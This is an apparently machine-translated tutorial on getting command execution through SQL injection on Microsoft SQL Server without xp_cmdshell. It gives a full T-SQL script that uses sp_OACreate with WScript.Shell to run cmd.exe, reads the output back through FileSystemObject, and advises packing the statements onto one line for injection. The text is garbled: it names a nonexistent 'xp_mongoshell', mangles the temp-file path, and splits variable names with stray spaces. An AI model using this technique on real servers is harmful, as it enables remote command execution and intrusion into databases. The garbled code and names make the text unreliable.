Run CMD commands on SQL servers with injection vulnerabilities without xp_cmdshell.

I found that even if xp_mongoshell is unavailable, it is still possible to run CMD on the server and get the echo result. here we need to use several other system stored procedures on the SQL SERVER: sp_OACreate, sp_OAGetProperty and sp_OAMethod. The premise is that Wscript. shell and Scripting. FileSystemObject on the server are available.
Sp_OACreate
In Microsoft®SQL Server™Create an OLE object instance on the instance.
Syntax
Sp_OACreate progid, | clsid,
Objecttoken OUTPUT
[, Context]
Sp_OAGetProperty
Obtains the attribute value of an OLE object.
Syntax
Sp_OAGetProperty objecttoken,
Propertyname
[, Propertyvalue OUTPUT]
[, Index...]
Sp_OAMethod
Call the method of the OLE object.
Syntax
Sp_OAMethod objecttoken,
Methodname
[, Returnvalue OUTPUT]
[, [@ Parametername =] parameter [OUTPUT]
[... N]

Ideas:
Create a Wscript on SQL Server first. shell, call its run method, output the execution result of cmd.exe to a file, and then create a Scripting. fileSystemObject creates a TextStream object, reads the characters in the temporary file, and adds one row to a temporary table.

The following are the corresponding SQL statements:

Create table mytmp (info VARCHAR (400), id int identity (1, 1) not null)
DECLARE @ shell INT
DECLARE @ fso INT
DECLARE @ file INT
DECLARE @ isEnd BIT
DECLARE @ out VARCHAR (400)
EXEC sp_oacreate wscript. shell, @ shell output
EXEC sp_oamethod @shell,run,null,cmd.exe/c dir c:> c: emp.txt, 0, true
-- Note that the run parameter true indicates the result of waiting for the program to run. This parameter must be used for long-time commands similar to ping.

EXEC sp_oacreate scripting. filesystemobject, @ fso output
EXEC sp_oamethod @ fso, opentextfile, @ file out, c: emp.txt
-- Because the fso opentextfile method returns a textstream object, @ file is an object token.

WHILE @ shell> 0
BEGIN
EXEC sp_oamethod @ file, Readline, @ out
Insert into mytmp (info) VALUES (@ out)
EXEC sp_oagetproperty @ file, AtEndOfStream, @ isEnd out
IF @ isEnd = 1 BREAK
ELSE CONTINUE
END

DROP TABLE MYTMP

Note:
If you use this method during the injection test, there cannot be so many line breaks, you must combine them into a line, and each statement is separated by a space character.